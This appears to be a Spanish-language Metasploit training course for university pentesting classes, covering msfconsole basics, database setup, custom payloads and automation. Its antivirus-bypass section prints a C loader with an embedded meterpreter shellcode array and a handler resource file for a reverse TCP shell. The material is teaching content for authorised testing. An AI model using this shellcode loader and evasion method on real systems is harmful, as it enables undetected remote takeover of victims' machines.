  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 28   Probamos  a  copiar  nuestro  nuevo  ejecutable  en  la  maquina  windows  y  vuelve  a   saltarnos  el  antivirus.         Creación  de  un  “payload”  personalizado  que  evite  los  antivirus.     Hay   varios   métodos   para   intentar   saltarse   un   antivirus,   entre   ellos   el   uso   de   “Packers”  como  “Themida”  o  “Hyperion”,  o  la  fabricación  casera  una  plantilla  de   meterpreter  personalizada.     Primero  creamos  un  fichero  de  texto  y  lo  llamamos  por  ejemplo  “base_met.c”.  En  el   metemos  el  siguiente  código:     /*                  Plantilla  custom  para  meterpreter.   */     //  Variable  para  el  relleno   unsigned  char  padding[]=     ;     //  Variable  para  el  metrerpreter   unsigned  char  payload[]=     ;     //  Cargamos  meterpreter  en  memoria   int  main(void)  {  ((void  (*)  ())payload)  ();  }      
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 29     Ahora  vamos  a  generar  el  relleno         y  el  payload         Todo  esto  lo  metemos  en  nuestra  plantilla  que  quedará  de  la  siguiente  forma:     /*                  Plantilla  custom  para  meterpreter.   */    
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 30   //  Variable  para  el  relleno   unsigned   char   padding[]="mG2gFU1lEzHkR8c2M0LfhdOxUArJoO8OXhXsSS65Nt6j3tjg1a3xT5bJls X9z29Vu3lPB_wEzIrCzD2Y32709XvaOc-­‐onkNKoy8Cf6h5N4mWt-­‐ ych1da8_J3WPvavFfZZDnlPhkxv7aAU5mqNDHYqXMAD_5anTPYscXg8CL7a3qh_Tl zkzIR8JSRQEdkh3h-­‐x-­‐ OoAQaLa8RTgi4dC38f2BjEly6fKgYoPoo1WJxr4ltn8nvN_Wpxh7-­‐ k99bZivlrHt82EptTkyfHKpOLyGi1sD1Q0ffx1vX9EAPevvIeBR4xDbOkfxNSpLJDfoZ LXVmoq-­‐KLibqdtCIs5-­‐bnIA8oOoxZsSf1Pd1VPdZSInc84zwysJCI6nZH-­‐VlgTp-­‐ ZqvKcmmI2nZZhc-­‐ 24Vk6G_l7vmaPWXBCNuAvLS958oxX9Fc8ZB1kD06qnC7H76WxmU6SvdRy-­‐ NMHs2b3gjq3isEeinuLPK56vy-­‐ M0W98cNB6TAu3ArBkkjINsQbuSicEt4e1iy9mZvU34T55_es3aeBfFuuDAfXFMlKW cPuBMwb9uSAOfMk2Hhhmzaf-­‐ tx2BZAdVCAGvViXTUeMU3c9XdbKF_YbL6rlduRGI0JRmiKMfH-­‐ 9zGa3dLXJhf02zUngIicSRJvprPIk0w0JuGgaZFoOzMEgDXZY9xYbEn41kVA0-­‐ Ocv3JQxBDSJGEK34MN91X-­‐ azxGxEG6nVhTF82_R2V8NP0OwXL_UbvoR6lCLNSIf8rRwxXbjF9OUysN5Yig3UsPO Ap17t1gphe8vwedGsC6iWDoWZf89ERk16nKrKUwDKkqHt-­‐ 24FPHF90f3JwyHsAXsXoVie1bjBU1rrcHKwy58PEKvecCVRBtouyd7987YfyCBeF8V z8JxiEs3VHHLW1rMezrUtTA7DLUo3Ap8JjHWAyyvrmWEnQVLqJtdIHxe0l5keyiAQ fEQHFuAdty-­‐ 9vbbfaPIZIsu1uruzTl9CuKxxk0UvDo7GFJkPl1NXsoxroH9bRCPNSZm0S9PqSwSH1 Cf8pitT4"   ;     //  Variable  para  el  metrerpreter   unsigned  char  payload[]=   "xbdxcfx92x4cx98xdaxdaxd9x74x24xf4x5ex29xc9xb1"   "x57x83xeexfcx31x6ex0ex03xa1x9cxaex6dxe4x6fx90"   "xffxc6xdax79x26x92x3ex76x82x71xf6xc7x65x06xe3"   "xd4xb7x7bxe0x27xcbx1ex3ax77x65xbbx51x53x32xac"   "x74xf5x25x6dx1cxe5x87x67x17xa0x76x61x79x38x92"   "x8ex50x6dx62xcdx95x08x94x93x41xfbx43x54x14x7f"   "xa2x78x65xd5x8fx71xbexc9xfbx0exe0xb1x25xb9x40"   "x9ax38x18xeexcbxd6xaax61xeax0ax90x2ax57x6cxc4"   "x72x46xf4x2bx0bx4exe3x15x64xbax3cx7cx73x5ex52"   "xb7xf5xf8x42x50x79x3fx70xd5xe6x36x18x31xc3xa8"   "x2bx6cxcfx3ex91x1fx2fx14xa4xbcxf9x13xa4xaax67"   "xfdxb1xe3x03x57x21xd0x89xe2x5dx10xc8xf8xbfxd1"   "x6dxc8x64xd4x0ax92x4exd9x7ax1fxf9xcex86xfcx5c"   "x50x7fx42x57x86x39x43x08x07x06x7cx39x19x4bxc5"   "x11xffx90x55xf9x26xb1x3axfdxe4x97xf7x8ex39x92"   "xbdx9axb9x8fxd5xcdx79xbcx24xf6xddxb9x49xabx67"   "x16x2ex3ax13xb0xfex1axe5xdex7exd6xc1x31xc6xe9"   "x78x95x9ax8dxcaxb8xb0x03xd9xbex16xecx47xbcxa2"   "xb5x22x3cxf3x59xcaxb9xb8xc0xc1xa4x02x08x5fxe1"  
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 31   "x19xb4xb7x46xa6x9cx67x19x6bxcax7ex04x79x53x6d"   "x94x2fx77x1ax9ax0bxb8x94x97x54x5bx68xfaxf6x9b"   "x29x05xe2x12xf5x36x02x42x3cx22x86xa7x03x46xda"   "x26x2ax5bx16xbdx85x4ex05x02xf6xa3x31xe7xc5xc2"   "x10x41x2fx04x32xe1x30x19x4dxa4x3ax9ax3fx30xdc"   "xfax4ax97x97xadxf6xf5x4bx47x96xe2"   ;     //  Cargamos  meterpreter  en  memoria   int  main(void)  {  ((void  (*)  ())payload)  ();  }       Ahora  hay  que  compilar  esta  plantilla  para  windows.  Tanto  en  Backtrack  como  en   Kali  Linux  necesitamos  “wine”  y  “mingw”  para  compilar  binarios  para  windows.  El   paquete   “wine”   viene   preinstalado,   pero   “mingw”   no   siempre   está.   Si   no   está   instalado,  hay  que  ejecutar  “apt-­‐get  install  mingw-­‐64”.     Una  vez  instalado  procedemos  con  la  compilación.         Ahora  probamos  a  ejecutarlo  en  la  maquina  Windows.  Para  ello  configuramos  un   “handler”   en   Metasploit   que   reciba   la   conexión   y   ejecutamos   el   binario   en   la   maquina.        
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 32           Nuestro  Metasploit  ha  recibido  la  conexión  de  “meterpreter”  y  hemos  tomado  el   control  de  la  máquina.        
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 33   Utilizar  Payloads  personalizados  desde  Metasploit.     En   Metasploit   es   posible   utilizar   “custom   payloads”   en   algunos   de   los   “exploits”   que   proporciona   (cualquier   “exploit”   de   Metasploit   que   suba   un   binario   a   la   maquina  víctima  y  lo  ejecute).     Esto  permite  que  ciertos  “exploits”  funcionen  aún  teniendo  la  máquina  víctima  un   antivirus  actualizado.     La  mayoría  de  “exploits”  para  Java,  navegadores,  etc  incluso  “psexec”  utilizado  para   el  ataque  “Pass  the  hash”  permiten  la  carga  de  “custom  payloads”.     Para  cargar  un  “payload”  personalizado,  en  primer  lugar  debe  crearse  el  “payload”,   por   ejemplo   mediante   la   técnica   utilizada   en   el   apartado   anterior   “Bypass   de   Antivirus”.  En  segundo  lugar  hay  que  decirle  a  Metasploit  donde  está  el  binario  que   queremos  utilizar  como  “payload”.  Lo  haremos  de  la  siguiente  forma:     msf>  set  EXE::Custom  /tmp/payload.exe     Para  saber  si  el  exploit  en  cuestión  acepta  la  opción  “EXE:Custom”  podemos  hacer   un   “show   advanced”   lo   cual   mostrará   las   opciones   avanzadas   del   “exploit”   y   comprobar  que  esta  opción  existe.     Si   configuramos   un   “payload”   personalizado,   no   es   necesario   configurar   “set   payload”,  ya  que  se  va  a  utilizar  el  binario  que  se  le  ha  proporcionado.    
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 34   Automatización  de  tareas  en  Metasploit.     En  Metasploit  podemos  crear  scripts  que  automaticen  las  tareas  que  deseamos   llevar  a  cabo,  y  luego  llamarlos  directamente  desde  la  consola  con  el  comando   “resource  filename.rc”  o  directamente  desde  la  Shell  de  Linux  con  “msfconsole  –r   filename.rc”.     El  fichero  “filename.rc”  simplemente  será  un  fichero  de  texto  con  los  comandos  de   Metasploit  a  ejecutar.     Ejemplo  fichero  “handler.rc”.   use  exploit/multi/handler   set  payload  windows/meterpreter/reverse_tcp   set  LHOST  192.168.100.64   set  LPORT  443   set  ExitOnSession  false   exploit  –j  -­‐z     Con  la  anterior  secuencia  de  comandos  creamos  un  “handler”  de  Metasploit  en  el   puerto  443  para  el  payload  “reverse_tcp”,  así  nos  ahorramos  llamar  todos  estos   comandos  cada  vez  que  deseemos  configurar  el  “handler”.    
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 35   Referencias.   • Metasploit  Unleashed  (http://www.offensive-­‐security.com/metasploit-­‐ unleashed/Main_Page)   • Metasploit  para  Pentesters  (Pablo  González  Pérez)  Ed:  0xword   • https://www.christophertruncer.com/     • http://www.darkoperator.com/    
  Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 36                                                                             Curso  de  Metasploit  Framework.     Autor:  Ignacio  Sorribas  Mollar.   CISSP,  OSCP,  CCNA,  CCNA  Security     email:  sorribas@at4sec.com   Twitter:  @NachoSorribas   LinkedIn:  http://es.linkedin.com/in/nachosorribas/   http://www.at4sec.com  

Más contenido relacionado

PPTX
Pirotecnia (1)
anahi098
 
PPT
Charla honeypots
navajanegra
 
PPT
Un gran hombre-ok
linmimei
 
DOC
Palash cv updated
PALASH BHOWMIK
 
PDF
41 parámetros y módulos generales
Aprende Viendo
 
PDF
42 jembatan
Marina Maharani
 
PPT
Edu 144 ch 3 flashcards
Claudia Anderson
 
PDF
Easy recovery621 user guide en
jmav1502
 
Pirotecnia (1)
anahi098
 
Charla honeypots
navajanegra
 
Un gran hombre-ok
linmimei
 
Palash cv updated
PALASH BHOWMIK
 
41 parámetros y módulos generales
Aprende Viendo
 
42 jembatan
Marina Maharani
 
Edu 144 ch 3 flashcards
Claudia Anderson
 
Easy recovery621 user guide en
jmav1502
 

Destacado (14)

XLSX
Real trabajod e sistemas
dcore777
 
PDF
Actividades Columbia - Año 2013
UniversidadColumbia
 
PDF
2016 fundi i_botes
JURIST
 
PDF
Pr gi 102 la senda del agua
Francisco Beltran de Heredia
 
PDF
Průvodce žlutým servisem (25.6.2012)
RegioJet
 
PDF
Agenturpräsentation 2016 - die dialogagenten
die dialogagenten Agentur Beratung Service GmbH
 
PDF
Presentacion sala cuadros modernos exoticae
Cuadros Modernos Exoticae
 
PPTX
V Congrés català de Salut Mental de la Infància i l'Adolescència
maigva
 
PDF
STRATEGIC ENVIRONMENTAL ASSESSMENT (SEA) current practices, future demands an...
zubeditufail
 
DOC
Comentarios 3ª i
HistoriaMJ
 
PPT
Power Point, Funciones De Scribd
laregota
 
PPTX
Etica zonificacion
Luis
 
PDF
La creacion y las 10 sefirod signed
Camilo Navarro Rubi
 
PDF
Banco central. Proceso de creación de dinero. Política monetaria.
Erick Gerson Tiburcio De La Cruz
 
Real trabajod e sistemas
dcore777
 
Actividades Columbia - Año 2013
UniversidadColumbia
 
2016 fundi i_botes
JURIST
 
Pr gi 102 la senda del agua
Francisco Beltran de Heredia
 
Průvodce žlutým servisem (25.6.2012)
RegioJet
 
Agenturpräsentation 2016 - die dialogagenten
die dialogagenten Agentur Beratung Service GmbH
 
Presentacion sala cuadros modernos exoticae
Cuadros Modernos Exoticae
 
V Congrés català de Salut Mental de la Infància i l'Adolescència
maigva
 
STRATEGIC ENVIRONMENTAL ASSESSMENT (SEA) current practices, future demands an...
zubeditufail
 
Comentarios 3ª i
HistoriaMJ
 
Power Point, Funciones De Scribd
laregota
 
Etica zonificacion
Luis
 
La creacion y las 10 sefirod signed
Camilo Navarro Rubi
 
Banco central. Proceso de creación de dinero. Política monetaria.
Erick Gerson Tiburcio De La Cruz
 
Publicidad

Similar a Curso de Metasploit (20)

PDF
Cpods training-metasploit
sonia yamile ortega carrillo
 
PDF
Sad tema2 pen_test_iii
Jesús Moreno León
 
PPTX
Ethical hacking 01
Tensor
 
PDF
Memoria Pruebas de intrusion mediante Metasploit Framework
ErlaitzParreoMuoz
 
PPTX
Armitage pruebas
Tensor
 
PPTX
Armitage pruebas
Tensor
 
PPTX
Ethical hacking 02
Tensor
 
PDF
Penetración con una Backdoor
NEGOCIOS PROPIOS
 
PDF
37 supervisión del sistema
Aprende Viendo
 
PDF
Episodio de pentesting
akencito
 
PPTX
AMENAZAS EN LA RED- METAPLOIT.pptx
HectorDeJesusTapiaGo
 
PPT
Pruebas de intrusion mediante Metasploit Framework
ErlaitzParreoMuoz
 
PDF
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Chema Alonso
 
DOC
Manual open marcopolo
John Gonzales Gaspar
 
PDF
Desarrollo de habilidades de pensamiento.pdf
isabellauruea
 
PDF
Desarrollo de habilidades de pensamiento.pdf
Nicole633450
 
PDF
Desarrollo de habilidades de pensamiento.pdf
BrendaMorales762761
 
DOCX
Desarrollo de habilidades de pensamiento.docx
IsabelSofiaFernndezC
 
PDF
Desarrollo de habilidades de pensamiento.pdf
CritianMuozCaicedo
 
PDF
Desarrollo de habilidades de pensamiento.pdf
CamilaDuque32
 
Cpods training-metasploit
sonia yamile ortega carrillo
 
Sad tema2 pen_test_iii
Jesús Moreno León
 
Ethical hacking 01
Tensor
 
Memoria Pruebas de intrusion mediante Metasploit Framework
ErlaitzParreoMuoz
 
Armitage pruebas
Tensor
 
Armitage pruebas
Tensor
 
Ethical hacking 02
Tensor
 
Penetración con una Backdoor
NEGOCIOS PROPIOS
 
37 supervisión del sistema
Aprende Viendo
 
Episodio de pentesting
akencito
 
AMENAZAS EN LA RED- METAPLOIT.pptx
HectorDeJesusTapiaGo
 
Pruebas de intrusion mediante Metasploit Framework
ErlaitzParreoMuoz
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Chema Alonso
 
Manual open marcopolo
John Gonzales Gaspar
 
Desarrollo de habilidades de pensamiento.pdf
isabellauruea
 
Desarrollo de habilidades de pensamiento.pdf
Nicole633450
 
Desarrollo de habilidades de pensamiento.pdf
BrendaMorales762761
 
Desarrollo de habilidades de pensamiento.docx
IsabelSofiaFernndezC
 
Desarrollo de habilidades de pensamiento.pdf
CritianMuozCaicedo
 
Desarrollo de habilidades de pensamiento.pdf
CamilaDuque32
 
Publicidad

Último (20)

PDF
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
Espanhol Online
 
PDF
Calidad desde el Docente y la mejora continua .pdf
marioosornozetina1
 
PPTX
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
PPTX
REDES INFORMATICAS REDES INFORMATICAS.pptx
rendertecno
 
PPT
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
PDF
5.1 Pinch y Bijker en libro Actos, actores y artefactos de Bunch Thomas (coor...
veronicafernandezab
 
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
PDF
Influencia-del-uso-de-redes-sociales.pdf
DianaLauraFloresAlva
 
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
PPTX
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
PDF
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
PPTX
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 
PDF
Plantilla para Diseño de Narrativas Transmedia.pdf
veronicafernandezab
 
PDF
Maste clas de estructura metálica y arquitectura
juancarlos542581
 
PDF
Estrategia de apoyo tecnología grado 9-3
edepmiguelsolis
 
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 
PDF
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
PDF
Estrategia de apoyo tecnología miguel angel solis
edepmiguelsolis
 
PPTX
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
marceloerazo119
 
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
Espanhol Online
 
Calidad desde el Docente y la mejora continua .pdf
marioosornozetina1
 
Propuesta BKP servidores con Acronis1.pptx
CarlosAndresuztes
 
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
REDES INFORMATICAS REDES INFORMATICAS.pptx
rendertecno
 
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
5.1 Pinch y Bijker en libro Actos, actores y artefactos de Bunch Thomas (coor...
veronicafernandezab
 
El-Gobierno-Electrónico-En-El-Estado-Bolivia
AlanAsojonih
 
Influencia-del-uso-de-redes-sociales.pdf
DianaLauraFloresAlva
 
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
SAP Transportation Management para LSP, TM140 Col18
Libreria ERP
 
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 
Plantilla para Diseño de Narrativas Transmedia.pdf
veronicafernandezab
 
Maste clas de estructura metálica y arquitectura
juancarlos542581
 
Estrategia de apoyo tecnología grado 9-3
edepmiguelsolis
 
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 
CyberOps Associate - Cisco Networking Academy
VICTOR MAESTRE RAMIREZ
 
Estrategia de apoyo tecnología miguel angel solis
edepmiguelsolis
 
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
marceloerazo119
 

Curso de Metasploit

  • 1.     Curso  de  Metasploit  v0.5.                                                               Autor:  Ignacio  Sorribas  Mollar   Twitter:  @NachoSorribas   Web:  www.at4sec.com      
  • 2. Metasploit  v0.5.   Índice     Índice  ............................................................................................................................................................  2   Changelog.  ..................................................................................................................................................  3   Introducción.  .............................................................................................................................................  4   Fases  de  un  test  de  intrusión.  ............................................................................................................  4   Comenzando  a  utilizar  Metasploit.  ..................................................................................................  5   Conectar  Metasploit  a  una  base  de  datos.  .................................................................................  10   Configurar  PostgreSQL  para  conectar  Metasploit  desde  cero.  ....................................  10   PostgreSQL  en  Kali  Linux.  ...........................................................................................................  13   Uso  de  la  Base  de  Datos  en  Metasploit.  ..................................................................................  14   Exploits  más  utilizados  en  servidores.  .......................................................................................  16   Exploits  “client  side”.  ..........................................................................................................................  16   Post-­‐Explotación.  .................................................................................................................................  17   Modificación  de  exploits  en  Metasploit.  .....................................................................................  21   Bypass  de  antivirus  con  Metasploit  .............................................................................................  26   Creación  de  un  “payload”  personalizado  que  evite  los  antivirus.  ..............................  28   Utilizar  Payloads  personalizados  desde  Metasploit.  .......................................................  33   Automatización  de  tareas  en  Metasploit.  ..................................................................................  34   Referencias.  ............................................................................................................................................  35      
  • 3. Metasploit  v0.5.   Changelog.     10/06/2013.  Versión  0.1.     • Documento  inicial.   13/06/2013.  Versión  0.2.     • Añadido  pié  de  página  con  números  de  página.   • Documentación  del  proceso  de  creación  de  base  de  datos  msf3  de   Metasploit  en  postgresql.   02/07/2013.  Versión  0.3.   • Diseño  de  documento.   • Añadido  índice.     • Mejorada  sección  modificación  exploits.   03/07/2013.  Versión  0.4.   • Configuración  de  PostrgreSQL  desde  cero.   05/07/2013.  Versión  0.5.   • Utilizar  custom  payloads      
  • 4.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 4   Introducción.     Este   documento   ha   sido   creado   para   impartir   formación   sobre   Metasploit   Framework   en   el   Curso   de   Seguridad   Avanzada   de   la   Universitat   Jaume   I   de   Castellón  (UJI),  así  como  para  el  módulo  de  Pentesting  del  Curso  de  postgrado  de   Auditorías  Informáticas  de  la  Universitat  Politécnica  de  Valencia  (UPV).     El  documento  todavía  se  encuentra  en  fase  de  mejoras,  con  lo  que  irán  apareciendo   nuevas  versiones.  Cualquier  “feedback”  por  parte  de  los  lectores  será  bienvenido.   Los  datos  de  contacto  del  autor  se  encuentran  al  final  del  mismo  documento.     Metasploit   es   un   “Framework”   para   realizar   test   de   intrusión   desarrollado   por   Rapid   7.   Existen   3   versiones   de   Metasploit,   entre   ellas   la   “Community   Edition”   sobre  la  que  vamos  a  basar  este  módulo.  Las  otras  2  versiones  son  “Metasploit  Pro”   y  “Metasploit  Express”  que  son  de  pago.     Metasploit  incorpora  un  “set”  de  herramientas  (exploits,  scanners,  payloads,  etc)   que  cubren  perfectamente  todas  las  fases  de  un  test  de  intrusión  (pentest),  desde   la   adquisición   de   información   y   reconocimiento,   hasta   el   descubrimiento   de   vulnerabilidades,  su  explotación  y  post  explotación.     En   este   documento   vamos   a   intentar   mostrar   el   funcionamiento   de   esta   herramienta  mediante  la  realización  de  ejemplos  prácticos.  Para  la  realización  de   dichos   ejemplos,   se   empleará   una   distribución   Linux   llamada   “Kali   Linux”   o   su   predecesora  “BackTrack  5r3”.     A  día  de  hoy,  Metasploit  se  considera  la  verdadera  “navaja  suiza  del  Pentester”.     Fases  de  un  test  de  intrusión.     Las  fases  de  un  test  de  intrusión  son  las  siguientes:     • Alcance  y  términos  del  test  de  intrusión.   • Recolección  de  información.   • Análisis  de  vulnerabilidades.   • Explotación  de  las  vulnerabilidades.   • Post-­‐Explotación  del  sistema.   • Generación  de  informes.     Metasploit   puede   ayudarnos   sobre   todo   en   las   fases   de   análisis   de   vulnerabilidades,  explotación  y  post-­‐explotación.      
  • 5.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 5   Comenzando  a  utilizar  Metasploit.     Metasploit  consta  de  varias  herramientas  distintas:   • msfconsole.  Consola  de  Metasploit.   • msfcli.  Nos  permite  ejecutar  módulos  directamente  sin  entrar  en  la  consola.   • msfpayload.  Para  generar  payloads.   • msfencode.   Permite   codificar   los   payloads   para   quitar   null   bytes   por   ejemplo.   • msfvenom.     Combinación   de   msfpayload   y   msfencode   en   una   sola   herramienta.   • etc.     Para  las  tareas  de  este  módulo,  utilizaremos  “msfconsle”.     Así  pues,  arrancamos  nuestro  Metasploit.       Como  se  ve  en  la  imagen,  Metasploit  muestra  el  número  de  componentes  de  cada   uno   de   los   5   módulos   en   los   que   está   organizado   (exploits,   auxiliary,   payloads,   encoders  y  nops).     Para  obtener  ayuda  sobre  los  comandos  disponibles  dentro  de  la  consola  se  puede   escribir  “help”  y  pulsar  el  intro.  
  • 6.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 6   Desde   la   propia   consola   se   pueden   ejecutar   comandos   del   propio   sistema   operativo  como  si  nos  encontráramos  en  la  Shell.       Un   comando   útil   e   importante   es   el   comando   “search”   que   nos   permite   buscar   dentro   de   los   módulos   de   Metasploit.   Por   ejemplo   vamos   a   buscar   el   exploit   de   “Ability  Server  2.34”.      
  • 7.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 7   Una  vez  localizado  el  “exploit”  deseado,  se  selecciona  mediante  el  comando  “use”.       El  comando  “show  options”  nos  muestra  las  opciones  de  configuración  que  acepta   el   “exploit”   escogido.   Algunas   vienen   ya   rellenadas   por   defecto,   pero   pueden   cambiarse  si  se  desea,  otras  hay  que  configurarlas  a  mano.  Así  pues  si  la  maquina   victima   tiene   la   dirección   IP   192.168.1.30,   se   utiliza   el   comando   “set”   para   configurar  la  variable  “RHOST”  (Remote  Host).       En  lugar  de  utilizar  “set”  para  configurar  las  variables,  podemos  utilizar  “setg”  (set   global)   lo   cual   configurará   la   variable   RHOST   de   forma   global,   con   lo   que   si   cambiamos  de  “exploit”  esta  ya  estará  configurada.     Todos  los  “exploits”  necesitan  un  “payload”  que  ejecutar  en  la  maquina  víctima,  así   que  debemos  seleccionar  uno.  Con  el  comando  “show  payloads”  podemos  ver  los   “payloads”  que  acepta  el  “exploit”  elegido.  
  • 8.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 8       Una   vez   sabemos   que   payload   utilizar,   simplemente   lo   configuramos   con   el   comando  “set”.       Como  puede  verse  ahora  al  ejecutar  “show  options”  también  aparecen  las  opciones   del  payload,  las  cuales  deben  configurarse.  La  variable  “LHOST”  (Local  host)  debe   contener  la  dirección  IP  a  la  que  se  conectará  la  maquina  víctima  cuando  se  ejecute   el  “payload”.     Además,   también   hay   que   configurar   el   “target”   del   exploit,   ya   que   no   todos   los   exploit  sirven  para  todos  los  sistemas  operativos,  o  para  todas  las  versiones  de  uno   de  ellos.     Con  “show  targets”  vemos  los  objetivos  aceptados  por  el  exploit.  
  • 9.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 9       Si  el  sistema  operativo  de  nuestra  maquina  objetivo  se  encuentra  entre  la  lista  de   sistemas   operativos   aceptados,   lo   elegimos   y   ya   estamos   listos   para   ejecutar   “exploit”.   Si   no   hay   que   modificar   el   exploit   para   que   acepte   a   nuestra   máquina   objetivo.       Ya  hemos  conseguido  una  Shell  en  nuestra  maquina  victima  utilizando  Metasploit.     Ahora   podemos   guardar   esta   configuración   para   que   la   próxima   vez   que   arranquemos  Metasploit  ya  esté  configurado  y  no  tener  que  repetir  nuevamente   los  pasos  anteriores.  Lo  haremos  con  el  comando  “save”,  el  cual  creará  el  fichero   “config”  dentro  del  directorio  “.msf4”  de  la  ruta  del  usuario  que  ejecuta  Metasploit   (root  en  este  caso).          
  • 10.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 10   Conectar  Metasploit  a  una  base  de  datos.     Durante  la  realización  de  un  Pentest,  se  recopila  gran  cantidad  de  información  que   suele  reutilizarse  en  distintas  fases  del  test.  Para  ello,  Metasploit  puede  integrarse   con   una   base   de   datos   PostgreSQL   la   cual   permitirá   el   almacenamiento   de   la   información  recopilada  de  una  manera  ordenada  y  fácil  de  buscar.     Configurar  PostgreSQL  para  conectar  Metasploit  desde  cero.     Nota:  El  siguiente  proceso  se  basa  en  una  distribución  Debian  con  Metasploit  ya   instalado.  Si  se  va  a  realizar  en  otra  distribución  de  Linux  distinta,  el  proceso  de   instalación  de  PostgreSQL  variará,  pero  la  configuración  y  conexión  con  Metasploit   será  la  misma.     En  primer  lugar  instalaremos  PostgreSQL  en  nuestra  maquina.           Este  proceso  instalará  el  motor  de  base  de  datos  y  creará  los  usuarios  pertinentes   en  el  sistema  (puede  comprobarlo  con  un  “cat  /etc/passwd”).  
  • 11.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 11     Ahora  crearemos  dentro  de  PostgreSQL  un  usuario  para  Metasploit  y  una  base  de   datos  utilizando  los  siguientes  comandos:     #sudo  –s   #sudo  postgres   #createuser  msf  –P  –S  –R  –D     #createdb  –O  msf  msf   #exit   #exit     En  la  siguiente  captura  se  observa  el  resultado  de  los  comandos  mencionados.       Comprobamos  el  puerto  donde  se  ha  instalado  postgres  (5432  por  defecto).       Creamos   el   fichero   “database.yml”   en   la   ruta   donde   esté   instalado   Metasploit   (/opt/metasploit/database.yml  por  ejemplo),  y  añadimos  el  siguiente  contenido.     production:        adapter:  postgresql        database:  msf        username:  msf        password:  MetasploitMola        host:  127.0.0.1        port:  5432        pool:  75        timeout:  5     Nota:  La  contraseña  del  campo  “password”  es  la  que  hemos  introducido  al  crear  el   usuario  “msf”  en  PostgreSQL.     Creamos  una  variable  de  entorno  en  “/etc/profile”  para  que  Metasploit  sepa  donde   está  el  fichero  de  configuración  de  la  Base  de  Datos  y  recargamos  el  “profile”.  
  • 12.   Advanced  Technologies  for  Security  S.L   C/  Gobernador  93,  Local  32   12003  Castellón   Tel.  964  230  111  /  Fax.  964  229  574     Página 12     #echo  export  MSF_DATABASE_CONFIG=/opt/metasploit/database.yml  >>  /etc/profile   #source  /etc/profile     Para   conectar   Metasploit   con   PostgreSQL,   ahora   necesitamos   instalar   algún   componente  más  de  ruby,  en  concreta  la  gema  “activerecord-­‐postgresql-­‐adapter”.     #gem  install  activerecord-­‐postgresql-­‐adapter         Ahora  arrancamos  Metasploit  con  el  comando  “msfconsole”.       Automáticamente   se   crearán   las   tablas   en   la   base   de   datos   creada   y   Metasploit   arrancará  conectado  al  base  de  datos.  
